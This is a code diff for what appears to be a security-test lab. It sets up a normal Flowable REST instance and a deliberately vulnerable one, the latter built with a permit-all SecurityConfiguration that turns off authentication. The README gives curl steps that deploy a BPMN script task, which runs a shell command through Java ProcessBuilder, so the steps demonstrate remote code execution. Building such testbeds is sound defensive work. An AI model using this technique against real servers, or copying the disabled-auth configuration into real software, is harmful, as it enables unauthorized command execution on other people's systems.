google · devampkid · Aug 12, 2025 · Aug 13, 2025 · Aug 13, 2025 · Aug 13, 2025
diff --git a/flowable/exposed_ui/Dockerfile b/flowable/exposed_ui/Dockerfile
@@ -0,0 +1,19 @@
+FROM eclipse-temurin:21-jdk AS builder
+
+# Copy the Flowable REST app libs for compilation classpath
+COPY --from=flowable/flowable-rest /app/WEB-INF/lib /libs
+COPY --from=flowable/flowable-rest /app/WEB-INF/classes /classes
+
+# Copy our replacement SecurityConfiguration
+COPY SecurityConfiguration.java /src/SecurityConfiguration.java
+
+# Compile the replacement SecurityConfiguration against the app's classpath
+RUN javac -cp "/libs/*:/classes" \
+    -d /output \
+    /src/SecurityConfiguration.java
+
+FROM flowable/flowable-rest
+
+# Replace the original SecurityConfiguration with our permit-all version
+COPY --from=builder /output/org/flowable/rest/conf/SecurityConfiguration.class \
+    /app/WEB-INF/classes/org/flowable/rest/conf/SecurityConfiguration.class
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
@@ -0,0 +1,40 @@
+# Setup secure and vulnerable Flowable instances
+```bash
+docker compose up
+```
+
+## Test Secure Instance
+The secure instance requires basic authentication (default credentials: `rest-admin:test`):
+```bash
+# Without credentials — should return 401 Unauthorized
+curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: 401
+
+# With credentials — should return 200 OK
+curl -v -u rest-admin:test http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200 with http response contains a json
+```
+
+## Test Vulnerable Instance
+The vulnerable instance has basic authentication disabled:
+```bash
+# Without credentials — should return 200 OK (no auth required)
+curl -v http://localhost:8081/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200 
+```
+
+# How to Exploit the Exposed UI (on Vulnerable Instance)
+```bash
+curl -X POST \
+    'http://localhost:8081/flowable-rest/service/repository/deployments' \
+    -H 'Content-Type: multipart/form-data' \
+    -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+    'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
+    -H 'Content-Type: application/json' \
+    -d '{
+    "processDefinitionKey": "jsScriptProcess"
+    }'
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java
@@ -0,0 +1,41 @@
+/* 
+ * Copyright 2026 Google LLC
+ * 
+ * Modified from the original version to remove authentication checks
+ * 
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ * 
+ */
+package org.flowable.rest.conf;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.web.SecurityFilterChain;
+
+@Configuration
+@EnableWebSecurity
+public class SecurityConfiguration {
+
+    @Bean
+    public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(authorize -> authorize
+                .anyRequest().permitAll()
+            )
+            .csrf(csrf -> csrf.disable())
+            .httpBasic(basic -> basic.disable());
+        return http.build();
+    }
+}
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
@@ -0,0 +1,22 @@
+version: '3'
+
+services:
+  flowable-secure:
+    image: flowable/flowable-rest
+    container_name: flowable-rest-secure
+    ports:
+      - "8080:8080"
+    networks:
+      - flowable-network
+
+  flowable-vulnerable:
+    build: .
+    container_name: flowable-rest-vulnerable
+    ports:
+      - "8081:8080"
+    networks:
+      - flowable-network
+
+networks:
+  flowable-network:
+    driver: bridge
diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
+             xmlns:flowable="http://flowable.org/bpmn"
+             targetNamespace="Examples">
+
+  <process id="jsScriptProcess" name="JavaScript Script Process">
+    <startEvent id="start" />
+    <sequenceFlow sourceRef="start" targetRef="scriptTask" />
+    <scriptTask id="scriptTask" name="Execute Command via JavaScript" 
+                scriptFormat="javascript" 
+                flowable:autoStoreVariables="true">
+      <script>
+        var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
+        var Arrays = Java.type('java.util.Arrays');
+        var Scanner = Java.type('java.util.Scanner');
+
+        var processBuilder = new ProcessBuilder(Arrays.asList('uname', '-a'));
+        var process = processBuilder.start();
+
+        var scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
+        var result = scanner.hasNext() ? scanner.next() : "";
+
+        execution.setVariable('commandOutput', result);
+      </script>
+    </scriptTask>
+    <sequenceFlow sourceRef="scriptTask" targetRef="end" />
+    <endEvent id="end" />
+  </process>
+
+</definitions>